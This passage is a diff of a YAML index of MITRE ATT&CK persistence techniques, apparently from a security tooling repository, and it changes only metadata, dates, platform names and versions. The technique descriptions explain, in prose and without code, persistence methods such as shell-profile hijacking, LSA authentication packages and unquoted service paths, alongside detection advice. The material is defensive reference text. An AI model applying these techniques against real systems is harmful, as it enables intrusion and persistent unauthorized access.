-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -33908,78 +34317,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -34027,6 +34369,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -34037,9 +34383,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -34048,8 +34398,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -34086,7 +34495,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -34109,12 +34518,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -34192,41 +34600,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -34235,27 +34613,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -34316,7 +34721,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -34360,7 +34764,7 @@ persistence:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -34382,7 +34786,6 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -34463,7 +34866,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -34486,7 +34888,7 @@ persistence:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -34516,12 +34918,10 @@ persistence:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1197:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:21:40.927Z'
       name: BITS Jobs
       description: |-
         Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
@@ -34611,12 +35011,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1197
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34701,7 +35100,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -34766,18 +35164,17 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34810,10 +35207,9 @@ persistence:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -34850,7 +35246,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.001:
     technique:
@@ -34924,7 +35319,7 @@ persistence:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34952,12 +35347,11 @@ persistence:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1505:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T21:18:29.349Z'
       name: Server Software Component
       description: 'Adversaries may abuse legitimate extensible development features
         of servers to establish persistent access to systems. Enterprise server applications
@@ -35016,33 +35410,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
-      type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -35063,6 +35434,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -35077,52 +35449,42 @@ persistence:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
-    atomic_tests: []
-  T1556.005:
-    technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
       type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.005:
+    technique:
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -35144,6 +35506,7 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -35154,23 +35517,50 @@ persistence:
         Directory PowerShell modules, such as <code>Set-ADUser</code> and <code>Set-ADAccountControl</code>,
         that change account configurations. \n\nMonitor Fine-Grained Password Policies
         and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Command: Command Execution'
       - 'User Account: User Account Metadata'
       - 'Script: Script Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+      created: '2022-01-13T20:02:28.349Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/005
+        external_id: T1556.005
+      - source_name: dump_pwd_dcsync
+        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+        url: https://adsecurity.org/?p=2053
+      - source_name: store_pwd_rev_enc
+        description: Microsoft. (2021, October 28). Store passwords using reversible
+          encryption. Retrieved January 3, 2022.
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+      - source_name: how_pwd_rev_enc_1
+        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+          encryption: how it works (part 1). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+      - source_name: how_pwd_rev_enc_2
+        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+          encryption: how it works (part 2). Retrieved November 17, 2021.'
+        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
